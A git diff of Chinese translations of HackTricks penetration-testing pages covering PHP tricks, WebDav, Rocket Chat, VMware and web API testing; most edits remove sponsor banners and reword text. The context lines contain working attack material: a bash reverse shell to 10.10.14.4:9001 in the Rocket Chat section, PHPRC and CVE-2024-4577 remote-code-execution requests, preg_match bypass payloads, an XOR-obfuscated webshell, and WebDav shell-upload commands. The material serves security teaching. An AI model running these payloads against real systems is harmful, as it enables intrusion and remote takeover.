-**从黑客的角度看待您的网络应用、网络和云**
-
-**查找并报告具有实际业务影响的关键可利用漏洞。** 使用我们 20 多个自定义工具来映射攻击面,查找让您提升权限的安全问题,并使用自动化漏洞收集重要证据,将您的辛勤工作转化为有说服力的报告。
-
-{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/README.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/README.md
index d9ef7fcc3..f20a38bda 100644
--- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/README.md
+++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/README.md
@@ -2,15 +2,8 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-

 
-**从黑客的角度看待您的网络应用、网络和云**
-
-**查找并报告具有实际业务影响的关键可利用漏洞。** 使用我们20多个自定义工具来映射攻击面,查找允许您提升权限的安全问题,并使用自动化利用收集重要证据,将您的辛勤工作转化为有说服力的报告。
-
-{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
-
-## Cookies 常见位置:
+## Cookies common location:
 
 这同样适用于 phpMyAdmin cookies。
 
@@ -30,7 +23,7 @@ Example: ../../../../../../tmp/sess_d1d531db62523df80e1153ada1d4b02e
 
 ### 松散比较/类型转换 ( == )
 
-如果在 PHP 中使用 `==`,则会出现一些意想不到的情况,比较的行为并不如预期。这是因为 "==" 只比较转换为相同类型的值,如果您还想比较被比较数据的类型是否相同,则需要使用 `===`。
+如果在 PHP 中使用 `==`,则会出现一些意外情况,比较的行为并不如预期。这是因为 "==" 只比较转换为相同类型的值,如果你还想比较被比较数据的类型是否相同,你需要使用 `===`。
 
 PHP 比较表: [https://www.php.net/manual/en/types.comparisons.php](https://www.php.net/manual/en/types.comparisons.php)
 
@@ -42,14 +35,14 @@ PHP 比较表: [https://www.php.net/manual/en/types.comparisons.php](https://w
 - `"0xAAAA" == "43690" -> True` 由十进制或十六进制格式的数字组成的字符串可以与其他数字/字符串进行比较,如果数字相同则结果为 True(字符串中的数字被解释为数字)
 - `"0e3264578" == 0 --> True` 一个以 "0e" 开头并后跟任何内容的字符串将等于 0
 - `"0X3264578" == 0X --> True` 一个以 "0" 开头并后跟任何字母(X 可以是任何字母)和后跟任何内容的字符串将等于 0
-- `"0e12334" == "0" --> True` 这非常有趣,因为在某些情况下,您可以控制 "0" 的字符串输入以及与之进行哈希和比较的某些内容。因此,如果您可以提供一个值,该值将创建一个以 "0e" 开头且没有任何字母的哈希,您可以绕过比较。您可以在这里找到 **已经哈希的字符串**: [https://github.com/spaze/hashes](https://github.com/spaze/hashes)
+- `"0e12334" == "0" --> True` 这非常有趣,因为在某些情况下你可以控制 "0" 的字符串输入以及与之进行哈希和比较的某些内容。因此,如果你可以提供一个值,该值将创建一个以 "0e" 开头且没有任何字母的哈希,你可以绕过比较。你可以在这里找到 **已经哈希的字符串**: [https://github.com/spaze/hashes](https://github.com/spaze/hashes)
 - `"X" == 0 --> True` 字符串中的任何字母等于 int 0
 
 更多信息请参见 [https://medium.com/swlh/php-type-juggling-vulnerabilities-3e28c4ed5c09](https://medium.com/swlh/php-type-juggling-vulnerabilities-3e28c4ed5c09)
 
 ### **in_array()**
 
-**类型转换** 也默认影响 `in_array()` 函数(您需要将第三个参数设置为 true 以进行严格比较):
+**类型转换** 也默认影响 `in_array()` 函数(你需要将第三个参数设置为 true 以进行严格比较):
 ```php
 $values = array("apple","orange","pear","grape");
 var_dump(in_array(0, $values));
@@ -76,11 +69,11 @@ if (!strcmp(array(),"real_pwd")) { echo "Real Password"; } else { echo "No Real
 ```
 ### preg_match(/^.\*/)
 
-**`preg_match()`** 可用于 **验证用户输入**(它 **检查** 是否有任何来自 **黑名单** 的 **单词/正则表达式** 在 **用户输入** 中,如果没有,代码可以继续执行)。
+**`preg_match()`** 可用于 **验证用户输入**(它 **检查** 是否有任何 **单词/正则表达式** 在 **黑名单** 中 **出现在** 用户输入中,如果没有,代码可以继续执行)。
 
 #### New line bypass
 
-然而,当限定正则表达式的开始时,`preg_match()` **只检查用户输入的第一行**,因此如果你能够以 **多行** 发送输入,你可能能够绕过此检查。示例:
+然而,当限定正则表达式的开始时,`preg_match()` **仅检查用户输入的第一行**,因此如果以某种方式可以 **发送** 多行输入,则可以绕过此检查。示例:
 ```php
 $myinput="aaaaaaa
 11111111"; //Notice the new line
@@ -93,18 +86,18 @@ echo preg_match("/^.*1/",$myinput);
 echo preg_match("/^.*1.*$/",$myinput);
 //0  --> In this scenario preg_match DOESN'T find the char "1"
 ```
-要绕过此检查,您可以**发送带有换行符的 URL 编码值**(`%0A`),或者如果您可以发送**JSON 数据**,则将其分成**多行**发送:
+要绕过此检查,您可以**发送带有换行符的 URL 编码值**(`%0A`),或者如果您可以发送**JSON 数据**,则将其**分成几行**:
 ```php
 {
 "cmd": "cat /etc/passwd"
 }
 ```
-找到一个例子在这里: [https://ramadistra.dev/fbctf-2019-rceservice](https://ramadistra.dev/fbctf-2019-rceservice)
+找到一个示例在这里: [https://ramadistra.dev/fbctf-2019-rceservice](https://ramadistra.dev/fbctf-2019-rceservice)
 
 #### **长度错误绕过**
 
 (这个绕过显然是在 PHP 5.2.5 上尝试的,我无法在 PHP 7.3.15 上使其工作)\
-如果你可以发送一个有效的非常 **大的输入** 给 `preg_match()`,它 **将无法处理它**,你将能够 **绕过** 检查。例如,如果它正在黑名单一个 JSON,你可以发送:
+如果你可以发送给 `preg_match()` 一个有效的非常 **大的输入**,它 **将无法处理**,你将能够 **绕过** 检查。例如,如果它正在黑名单一个 JSON,你可以发送:
 ```bash
 payload = '{"cmd": "ls -la", "injected": "'+ "a"*1000001 + '"}'
 ```
@@ -119,9 +112,9 @@ payload = '{"cmd": "ls -la", "injected": "'+ "a"*1000001 + '"}'
 简而言之,问题发生是因为 PHP 中的 `preg_*` 函数基于 [PCRE 库](http://www.pcre.org/)。在 PCRE 中,某些正则表达式通过大量递归调用进行匹配,这会消耗大量的栈空间。可以设置允许的递归次数限制,但在 PHP 中,这个限制 [默认为 100,000](http://php.net/manual/en/pcre.configuration.php#ini.pcre.recursion-limit),这超过了栈的容量。
 
 [这个 Stackoverflow 线程](http://stackoverflow.com/questions/7620910/regexp-in-preg-match-function-returning-browser-error) 也在帖子中被链接,深入讨论了这个问题。我们的任务现在很明确:\
-**发送一个输入,使正则表达式进行 100_000+ 次递归,导致 SIGSEGV,使得 `preg_match()` 函数返回 `false`,从而使应用程序认为我们的输入不是恶意的,在有效负载的最后抛出一个类似 `{system()}` 的惊喜以获取 SSTI --> RCE --> flag :)**。
+**发送一个输入,使正则表达式进行 100_000+ 次递归,导致 SIGSEGV,使得 `preg_match()` 函数返回 `false`,从而使应用程序认为我们的输入不是恶意的,在有效负载的最后抛出一个类似 `{system()}` 的惊喜以获得 SSTI --> RCE --> flag :)**。
 
-好吧,从正则表达式的角度来看,我们实际上并没有进行 100k 次“递归”,而是计算“回溯步骤”,正如 [PHP 文档](https://www.php.net/manual/en/pcre.configuration.php#ini.pcre.recursion-limit) 所述,它在 `pcre.backtrack_limit` 变量中默认为 1_000_000(1M)。\
+好吧,从正则表达式的角度来看,我们实际上并不是在进行 100k 次“递归”,而是在计算“回溯步骤”,正如 [PHP 文档](https://www.php.net/manual/en/pcre.configuration.php#ini.pcre.recursion-limit) 所述,它在 `pcre.backtrack_limit` 变量中默认为 1_000_000(1M)。\
 要达到这个,`'X'*500_001` 将导致 100 万个回溯步骤(50万向前和50万向后):
 ```python
 payload = f"@dimariasimone on{'X'*500_001} {{system('id')}}"
@@ -139,7 +132,7 @@ $obfs += ""; //int 7
 ```
 ## Execute After Redirect (EAR)
 
-如果 PHP 在重定向到另一个页面后没有在设置头部 `Location` 后调用 **`die`** 或 **`exit`** 函数,PHP 将继续执行并将数据附加到主体:
+如果 PHP 在重定向到另一个页面后没有调用 **`die`** 或 **`exit`** 函数,PHP 将继续执行并将数据附加到主体:
 ```php
 
 ```
-## 路径遍历和文件包含漏洞
+## 路径遍历和文件包含漏洞利用
 
 检查:
 
@@ -159,7 +152,7 @@ readfile($page);
 
 ## 更多技巧
 
-- **register_globals**: 在 **PHP < 4.1.1.1** 或者配置错误的情况下,**register_globals** 可能是激活的(或者其行为被模拟)。这意味着在全局变量如 $\_GET 中,如果它们有值,例如 $\_GET\["param"]="1234",你可以通过 **$param 访问它。因此,通过发送 HTTP 参数,你可以覆盖代码中使用的变量\*\*。
+- **register_globals**: 在 **PHP < 4.1.1.1** 或者如果配置错误,**register_globals** 可能是激活的(或者其行为被模拟)。这意味着在全局变量如 $\_GET 中,如果它们有值,例如 $\_GET\["param"]="1234",你可以通过 **$param 访问它。因此,通过发送 HTTP 参数,你可以覆盖在代码中使用的变量\*\*。
 - **同一域的 PHPSESSION cookies 存储在同一位置**,因此如果在一个域中 **不同路径使用不同的 cookies**,你可以使该路径 **访问该路径的 cookie**,设置其他路径 cookie 的值。\
 这样,如果 **两个路径访问同名变量**,你可以使 **路径1中的该变量的值应用于路径2**。然后路径2将视路径1的变量为有效(通过给 cookie 赋予在路径2中对应的名称)。
 - 当你拥有机器用户的 **用户名** 时。检查地址: **/\~\** 以查看 php 目录是否被激活。
@@ -167,8 +160,8 @@ readfile($page);
 
 ### password_hash/password_verify
 
-这些函数通常在 PHP 中用于 **从密码生成哈希** 并 **检查** 密码是否与哈希匹配。\
-支持的算法有:`PASSWORD_DEFAULT` 和 `PASSWORD_BCRYPT`(以 `$2y$` 开头)。请注意,**PASSWORD_DEFAULT 通常与 PASSWORD_BCRYPT 相同。** 目前,**PASSWORD_BCRYPT** 在输入上有 **72字节的大小限制**。因此,当你尝试用该算法对大于 72 字节的内容进行哈希时,仅会使用前 72B:
+这些函数通常在 PHP 中用于 **从密码生成哈希**,并 **检查** 密码是否与哈希匹配。\
+支持的算法有:`PASSWORD_DEFAULT` 和 `PASSWORD_BCRYPT`(以 `$2y$` 开头)。请注意,**PASSWORD_DEFAULT 通常与 PASSWORD_BCRYPT 相同。** 目前,**PASSWORD_BCRYPT** 在输入上有 **72字节的大小限制**。因此,当你尝试用此算法对大于 72 字节的内容进行哈希时,仅会使用前 72B:
 ```php
 $cont=71; echo password_verify(str_repeat("a",$cont), password_hash(str_repeat("a",$cont)."b", PASSW
 False
@@ -180,9 +173,9 @@ True
 
 #### Causing error after setting headers
 
-从 [**这个推特线程**](https://twitter.com/pilvar222/status/1784618120902005070?t=xYn7KdyIvnNOlkVaGbgL6A&s=19) 你可以看到,发送超过 1000 个 GET 参数或 1000 个 POST 参数或 20 个文件时,PHOP 不会在响应中设置头部。
+从[**这个推特线程**](https://twitter.com/pilvar222/status/1784618120902005070?t=xYn7KdyIvnNOlkVaGbgL6A&s=19)中可以看到,发送超过1000个GET参数或1000个POST参数或20个文件时,PHP不会在响应中设置头部。
 
-这允许绕过例如在代码中设置的 CSP 头部,如:
+这允许绕过例如在代码中设置的CSP头部,如:
 ```php
  在这种情况下,要获得 **RCE**,您可以这样做:
 ```
 ?page=a','NeVeR') === false and system('ls') and strpos('a
 ```
-您需要**破坏**代码**语法**,**添加**您的**有效载荷**,然后**再次修复**它。您可以使用**逻辑运算**,例如“**and**”或“%26%26”或“|”。请注意,“or”和“||”不起作用,因为如果第一个条件为真,我们的有效载荷将不会被执行。同样,“;”也不起作用,因为我们的有效载荷不会被执行。
+您需要**破坏**代码**语法**,**添加**您的**有效载荷**,然后**再修复它**。您可以使用**逻辑运算**,例如“**and**”或“%26%26”或“|”。请注意,“or”和“||”不起作用,因为如果第一个条件为真,我们的有效载荷将不会被执行。同样,“;”也不起作用,因为我们的有效载荷不会被执行。
 
 **另一个选项**是将命令的执行添加到字符串中:`'.highlight_file('.passwd').'`
 
@@ -279,7 +272,7 @@ usort();}phpinfo;#, "cmp");
 
 ### 通过环境变量进行 RCE
 
-如果您发现一个漏洞,允许您 **修改 PHP 中的环境变量**(还有另一个漏洞可以上传文件,尽管经过更多研究可能可以绕过),您可以利用这种行为来获得 **RCE**。
+如果您发现一个漏洞,允许您 **修改 PHP 中的环境变量**(还有另一个上传文件的漏洞,尽管经过更多研究可能可以绕过),您可以利用这种行为来获取 **RCE**。
 
 - [**`LD_PRELOAD`**](../../../linux-hardening/privilege-escalation/#ld_preload-and-ld_library_path):此环境变量允许您在执行其他二进制文件时加载任意库(尽管在这种情况下可能不起作用)。
 - **`PHPRC`**:指示 PHP **在哪里查找其配置文件**,通常称为 `php.ini`。如果您可以上传自己的配置文件,则使用 `PHPRC` 指向它。添加一个 **`auto_prepend_file`** 条目,指定第二个上传的文件。这个第二个文件包含正常的 **PHP 代码,然后由 PHP 运行时执行**,在任何其他代码之前。
@@ -290,7 +283,7 @@ usort();}phpinfo;#, "cmp");
 - **PHPRC** - 另一个选项
 - 如果您 **无法上传文件**,您可以在 FreeBSD 中使用 "file" `/dev/fd/0`,它包含 **`stdin`**,即发送到 `stdin` 的请求 **主体**:
 - `curl "http://10.12.72.1/?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"'`
-- 或者要获得 RCE,启用 **`allow_url_include`** 并预先添加一个包含 **base64 PHP 代码** 的文件:
+- 或者要获取 RCE,启用 **`allow_url_include`** 并预先添加一个包含 **base64 PHP 代码** 的文件:
 - `curl "http://10.12.72.1/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="'`
 - 技术 [**来自此报告**](https://vulncheck.com/blog/juniper-cve-2023-36845)。
 
@@ -300,7 +293,7 @@ Web 服务器解析 HTTP 请求并将其传递给执行请求的 PHP 脚本,
 ```jsx
 -d allow_url_include=1 -d auto_prepend_file=php://input
 ```
-此外,由于后续的 PHP 规范化,可以使用 0xAD 字符注入 "-" 参数。检查来自 [**这篇文章**](https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/) 的漏洞示例:
+此外,由于后续的 PHP 规范化,可以使用 0xAD 字符注入 "-" 参数。检查来自 [**this post**](https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/) 的漏洞示例:
 ```jsx
 POST /test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
 Host: {{host}}
@@ -330,19 +323,19 @@ exec, shell_exec, system, passthru, eval, popen
 unserialize, include, file_put_cotents
 $_COOKIE | if #This mea
 ```
-如果您正在调试 PHP 应用程序,可以在`/etc/php5/apache2/php.ini`中全局启用错误打印,添加`display_errors = On`并重启 apache:`sudo systemctl restart apache2`
+如果您正在调试 PHP 应用程序,可以通过在 `/etc/php5/apache2/php.ini` 中添加 `display_errors = On` 来全局启用错误打印,然后重启 apache: `sudo systemctl restart apache2`
 
-### 反混淆 PHP 代码
+### 解混淆 PHP 代码
 
-您可以使用 **web**[ **www.unphp.net**](http://www.unphp.net) **来反混淆 php 代码。**
+您可以使用 **web**[ **www.unphp.net**](http://www.unphp.net) **来解混淆 php 代码。**
 
 ## PHP 包装器和协议
 
-PHP 包装器和协议可能允许您**绕过系统中的读写保护**并危害系统。有关[**更多信息,请查看此页面**](../../../pentesting-web/file-inclusion/#lfi-rfi-using-php-wrappers-and-protocols)。
+PHP 包装器和协议可能允许您 **绕过系统中的读写保护** 并危害系统。有关 [**更多信息,请查看此页面**](../../../pentesting-web/file-inclusion/#lfi-rfi-using-php-wrappers-and-protocols)。
 
 ## Xdebug 未经身份验证的 RCE
 
-如果您在 `phpconfig()` 输出中看到 **Xdebug** 已**启用**,您应该尝试通过 [https://github.com/nqxcode/xdebug-exploit](https://github.com/nqxcode/xdebug-exploit) 获取 RCE。
+如果您在 `phpconfig()` 输出中看到 **Xdebug** 已 **启用**,您应该尝试通过 [https://github.com/nqxcode/xdebug-exploit](https://github.com/nqxcode/xdebug-exploit) 获取 RCE。
 
 ## 变量变量
 ```php
@@ -381,7 +374,7 @@ $_($___); #If ¢___ not needed then $_($__), show_source(.passwd)
 ```
 ### XOR 简易 Shell 代码
 
-根据 [**这篇文章** ](https://mgp25.com/ctf/Web-challenge/)可以通过以下方式生成简易的 Shell 代码:
+根据 [**这篇文章** ](https://mgp25.com/ctf/Web-challenge/)以下方式可以生成一个简易的 Shellcode:
 ```php
 $_="`{{{"^"?<>/"; // $_ = '_GET';
 ${$_}[_](${$_}[__]); // $_GET[_]($_GET[__]);
@@ -417,7 +410,7 @@ lt;>/'^'{{{{';\${\$_}[_](\${\$_}[__]);" `$_='
 ```php
 lt;>/'^'{{{{'; --> _GET` `${$_}[_](${$_}[__]); --> $_GET[_]($_GET[__])` `So, the function is inside $_GET[_] and the parameter is inside $_GET[__]` http --form POST "http://victim.com/index.php?_=system&__=$CMD" "input=$CODE"
 ```
-### 类似Perl
+### 类似 Perl
 ```php
 

-
-**从黑客的角度看待您的网络应用、网络和云**
-
-**查找并报告具有实际业务影响的关键可利用漏洞。** 使用我们20多个自定义工具来映射攻击面,发现让您提升权限的安全问题,并使用自动化利用收集重要证据,将您的辛勤工作转化为有说服力的报告。
-
-{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
-
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/network-services-pentesting/pentesting-web/put-method-webdav.md b/src/network-services-pentesting/pentesting-web/put-method-webdav.md
index c45247ea8..72acbabe5 100644
--- a/src/network-services-pentesting/pentesting-web/put-method-webdav.md
+++ b/src/network-services-pentesting/pentesting-web/put-method-webdav.md
@@ -1,35 +1,27 @@
 # WebDav
 
-

-
-\
-使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=put-method-webdav) 轻松构建和 **自动化工作流程**,由世界上 **最先进** 的社区工具提供支持。\
-立即获取访问权限:
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=put-method-webdav" %}
-
 {{#include ../../banners/hacktricks-training.md}}
 
-在处理 **启用 WebDav 的 HTTP 服务器** 时,如果您拥有正确的 **凭据**,通常通过 **HTTP 基本认证** 验证,则可以 **操纵文件**。控制此类服务器通常涉及 **上传和执行 webshell**。
+当处理一个**启用WebDav的HTTP服务器**时,如果你拥有正确的**凭据**,通常通过**HTTP基本认证**进行验证,就可以**操纵文件**。控制这样的服务器通常涉及**上传和执行webshell**。
 
-访问 WebDav 服务器通常需要 **有效凭据**,而 [**WebDav 暴力破解**](../../generic-hacking/brute-force.md#http-basic-auth) 是获取它们的常见方法。
+访问WebDav服务器通常需要**有效的凭据**,[**WebDav暴力破解**](../../generic-hacking/brute-force.md#http-basic-auth)是获取它们的常见方法。
 
-为了克服文件上传的限制,特别是那些阻止服务器端脚本执行的限制,您可以:
+为了克服文件上传的限制,特别是那些阻止执行服务器端脚本的限制,你可以:
 
-- 如果没有限制,直接 **上传** 带有 **可执行扩展名** 的文件。
-- 将上传的非可执行文件(如 .txt)重命名为可执行扩展名。
-- **复制** 上传的非可执行文件,将其扩展名更改为可执行的扩展名。
+- 如果没有限制,**直接上传**具有**可执行扩展名**的文件。
+- **重命名**上传的非可执行文件(如.txt)为可执行扩展名。
+- **复制**上传的非可执行文件,将其扩展名更改为可执行的扩展名。
 
 ## DavTest
 
-**Davtest** 尝试 **上传多个不同扩展名的文件** 并 **检查** 扩展名是否 **被执行**:
+**Davtest**尝试**上传多个不同扩展名的文件**并**检查**扩展名是否被**执行**:
 ```bash
 davtest [-auth user:password] -move -sendbd auto -url http:// #Uplaod .txt files and try to move it to other extensions
 davtest [-auth user:password] -sendbd auto -url http:// #Try to upload every extension
 ```
 ![](<../../images/image (851).png>)
 
-这并不意味着 **.txt** 和 **.html 扩展名正在被执行**。这意味着您可以 **通过网络访问这些文件**。
+这并不意味着 **.txt** 和 **.html 扩展名正在被执行**。这意味着您可以通过网络 **访问这些文件**。
 
 ## Cadaver
 
@@ -42,26 +34,18 @@ cadaver 
 curl -T 'shell.txt' 'http://$ip'
 ```
 ## MOVE 请求
-```
+```bash
 curl -X MOVE --header 'Destination:http://$ip/shell.php' 'http://$ip/shell.txt'
 ```
-

-
-\
-使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=put-method-webdav) 轻松构建和 **自动化工作流**,由世界上 **最先进** 的社区工具提供支持。\
-立即获取访问权限:
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=put-method-webdav" %}
-
 ## IIS5/6 WebDav 漏洞
 
-这个漏洞非常有趣。**WebDav** 不允许 **上传** 或 **重命名** 扩展名为 **.asp** 的文件。但你可以通过在名称末尾 **添加** **";.txt"** 来 **绕过** 这个限制,文件将被 **执行**,就像它是一个 .asp 文件(你也可以 **使用 ".html" 而不是 ".txt"**,但 **不要忘记 ";"**)。
+这个漏洞非常有趣。**WebDav** **不允许** **上传** 或 **重命名** 扩展名为 **.asp** 的文件。但你可以通过在名称末尾 **添加** **";.txt"** 来 **绕过** 这个限制,文件将被 **执行** 就像它是一个 .asp 文件(你也可以 **使用 ".html" 而不是 ".txt"** 但 **不要忘记 ";"**)。
 
-然后你可以将你的 shell 作为一个 ".**txt" 文件 **上传,并 **复制/移动** 到一个 ".asp;.txt" 文件。通过网络服务器访问该文件时,它将被 **执行**(cadaver 会说移动操作没有成功,但实际上是成功的)。
+然后你可以将你的 shell 作为一个 ".**txt" 文件** **上传** 并 **复制/移动** 到一个 ".asp;.txt" 文件。通过网络服务器访问该文件时,它将被 **执行** (cadaver 会说移动操作没有成功,但实际上是成功的)。
 
 ![](<../../images/image (1092).png>)
 
-## 后置凭证
+## 后凭证
 
 如果 Webdav 使用的是 Apache 服务器,你应该查看 Apache 中配置的网站。通常:\
 \&#xNAN;_**/etc/apache2/sites-enabled/000-default**_
@@ -81,7 +65,7 @@ Require valid-user
 ```
 /etc/apache2/users.password
 ```
-在这种类型的文件中,您将找到 **用户名** 和 **密码的哈希**。这些是 webdav 服务器用于验证用户的凭据。
+在这种类型的文件中,您将找到 **用户名** 和 **密码** 的 **哈希**。这些是 webdav 服务器用于验证用户的凭据。
 
 您可以尝试 **破解** 它们,或者如果出于某种原因您想要 **访问** **webdav** 服务器,可以 **添加更多**:
 ```bash
@@ -91,16 +75,8 @@ htpasswd /etc/apache2/users.password  #You will be prompted for the pa
 ```bash
 wget --user  --ask-password http://domain/path/to/webdav/ -O - -q
 ```
-## 参考
+## 参考文献
 
 - [https://vk9-sec.com/exploiting-webdav/](https://vk9-sec.com/exploiting-webdav/)
 
 {{#include ../../banners/hacktricks-training.md}}
-
-

-
-\
-使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=put-method-webdav) 轻松构建和 **自动化工作流程**,由世界上 **最先进** 的社区工具提供支持。\
-立即获取访问权限:
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=put-method-webdav" %}
diff --git a/src/network-services-pentesting/pentesting-web/rocket-chat.md b/src/network-services-pentesting/pentesting-web/rocket-chat.md
index 34c7cef86..01fdf0769 100644
--- a/src/network-services-pentesting/pentesting-web/rocket-chat.md
+++ b/src/network-services-pentesting/pentesting-web/rocket-chat.md
@@ -2,10 +2,6 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-

-
-{% embed url="https://websec.nl/" %}
-
 ## RCE
 
 如果你是 Rocket Chat 的管理员,你可以获得 RCE。
@@ -34,10 +30,7 @@ exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
 
 

 
-- 使用 curl 调用它,你应该收到反向 shell
+- 使用 curl 调用它,你应该收到 rev shell
 
-

-
-{% embed url="https://websec.nl/" %}
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/network-services-pentesting/pentesting-web/vmware-esx-vcenter....md b/src/network-services-pentesting/pentesting-web/vmware-esx-vcenter....md
index fe00f49ad..cfc2088d1 100644
--- a/src/network-services-pentesting/pentesting-web/vmware-esx-vcenter....md
+++ b/src/network-services-pentesting/pentesting-web/vmware-esx-vcenter....md
@@ -1,9 +1,5 @@
 {{#include ../../banners/hacktricks-training.md}}
 
-

-
-{% embed url="https://websec.nl/" %}
-
 # 枚举
 ```bash
 nmap -sV --script "http-vmware-path-vuln or vmware-version" -p  
@@ -15,9 +11,3 @@ msf> use auxiliary/scanner/http/ms15_034_http_sys_memory_dump
 msf> auxiliary/scanner/vmware/vmware_http_login
 ```
 如果您找到有效的凭据,可以使用更多的metasploit扫描模块来获取信息。
-
-

-
-{% embed url="https://websec.nl/" %}
-
-{{#include ../../banners/hacktricks-training.md}}
diff --git a/src/network-services-pentesting/pentesting-web/web-api-pentesting.md b/src/network-services-pentesting/pentesting-web/web-api-pentesting.md
index e3e86a293..77a9b21a9 100644
--- a/src/network-services-pentesting/pentesting-web/web-api-pentesting.md
+++ b/src/network-services-pentesting/pentesting-web/web-api-pentesting.md
@@ -2,42 +2,35 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-

-
-使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=web-api-pentesting) 轻松构建和 **自动化工作流**,由世界上 **最先进** 的社区工具提供支持。\
-今天就获取访问权限:
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=web-api-pentesting" %}
-
-## API Pentesting 方法论总结
+## API Pentesting Methodology Summary
 
 Pentesting APIs 涉及一种结构化的方法来发现漏洞。本指南概括了一种全面的方法论,强调实用的技术和工具。
 
-### **理解 API 类型**
+### **Understanding API Types**
 
-- **SOAP/XML Web Services**:使用 WSDL 格式进行文档记录,通常在 `?wsdl` 路径下找到。像 **SOAPUI** 和 **WSDLer**(Burp Suite 扩展)这样的工具对于解析和生成请求至关重要。示例文档可在 [DNE Online](http://www.dneonline.com/calculator.asmx) 获取。
-- **REST APIs (JSON)**:文档通常以 WADL 文件形式提供,但像 [Swagger UI](https://swagger.io/tools/swagger-ui/) 这样的工具提供了更用户友好的交互界面。**Postman** 是创建和管理示例请求的有价值工具。
-- **GraphQL**:一种用于 API 的查询语言,提供对 API 中数据的完整和可理解的描述。
+- **SOAP/XML Web Services**: 使用 WSDL 格式进行文档编制,通常在 `?wsdl` 路径中找到。工具如 **SOAPUI** 和 **WSDLer** (Burp Suite Extension) 对于解析和生成请求非常重要。示例文档可在 [DNE Online](http://www.dneonline.com/calculator.asmx) 获取。
+- **REST APIs (JSON)**: 文档通常以 WADL 文件形式提供,但像 [Swagger UI](https://swagger.io/tools/swagger-ui/) 这样的工具提供了更用户友好的交互界面。**Postman** 是创建和管理示例请求的有价值工具。
+- **GraphQL**: 一种用于 API 的查询语言,提供对 API 中数据的完整和可理解的描述。
 
-### **实践实验室**
+### **Practice Labs**
 
-- [**VAmPI**](https://github.com/erev0s/VAmPI):一个故意存在漏洞的 API,供实践使用,涵盖 OWASP 前 10 大 API 漏洞。
+- [**VAmPI**](https://github.com/erev0s/VAmPI): 一个故意存在漏洞的 API,供实践使用,涵盖 OWASP 前 10 大 API 漏洞。
 
-### **API Pentesting 的有效技巧**
+### **Effective Tricks for API Pentesting**
 
-- **SOAP/XML 漏洞**:探索 XXE 漏洞,尽管 DTD 声明通常受到限制。如果 XML 保持有效,CDATA 标签可能允许有效负载插入。
-- **权限提升**:测试具有不同权限级别的端点,以识别未授权访问的可能性。
-- **CORS 配置错误**:检查 CORS 设置,以寻找通过已认证会话的 CSRF 攻击的潜在利用可能性。
-- **端点发现**:利用 API 模式发现隐藏的端点。像模糊测试工具可以自动化此过程。
-- **参数篡改**:尝试在请求中添加或替换参数,以访问未授权的数据或功能。
-- **HTTP 方法测试**:更改请求方法(GET、POST、PUT、DELETE、PATCH),以发现意外行为或信息泄露。
-- **内容类型操控**:在不同的内容类型(x-www-form-urlencoded、application/xml、application/json)之间切换,以测试解析问题或漏洞。
-- **高级参数技术**:在 JSON 有效负载中测试意外数据类型,或玩弄 XML 数据以进行 XXE 注入。同时,尝试参数污染和通配符字符以进行更广泛的测试。
-- **版本测试**:较旧的 API 版本可能更容易受到攻击。始终检查并测试多个 API 版本。
+- **SOAP/XML Vulnerabilities**: 探索 XXE 漏洞,尽管 DTD 声明通常受到限制。如果 XML 保持有效,CDATA 标签可能允许有效负载插入。
+- **Privilege Escalation**: 测试具有不同权限级别的端点,以识别未经授权的访问可能性。
+- **CORS Misconfigurations**: 检查 CORS 设置,以寻找通过已认证会话的 CSRF 攻击的潜在利用可能性。
+- **Endpoint Discovery**: 利用 API 模式发现隐藏的端点。像模糊测试工具可以自动化此过程。
+- **Parameter Tampering**: 尝试在请求中添加或替换参数,以访问未经授权的数据或功能。
+- **HTTP Method Testing**: 变更请求方法(GET, POST, PUT, DELETE, PATCH)以发现意外行为或信息泄露。
+- **Content-Type Manipulation**: 在不同内容类型(x-www-form-urlencoded, application/xml, application/json)之间切换,以测试解析问题或漏洞。
+- **Advanced Parameter Techniques**: 在 JSON 有效负载中测试意外数据类型或玩弄 XML 数据以进行 XXE 注入。同时,尝试参数污染和通配符字符以进行更广泛的测试。
+- **Version Testing**: 较旧的 API 版本可能更容易受到攻击。始终检查并测试多个 API 版本。
 
-### **API Pentesting 的工具和资源**
+### **Tools and Resources for API Pentesting**
 
-- [**kiterunner**](https://github.com/assetnote/kiterunner):非常适合发现 API 端点。使用它扫描和暴力破解目标 API 的路径和参数。
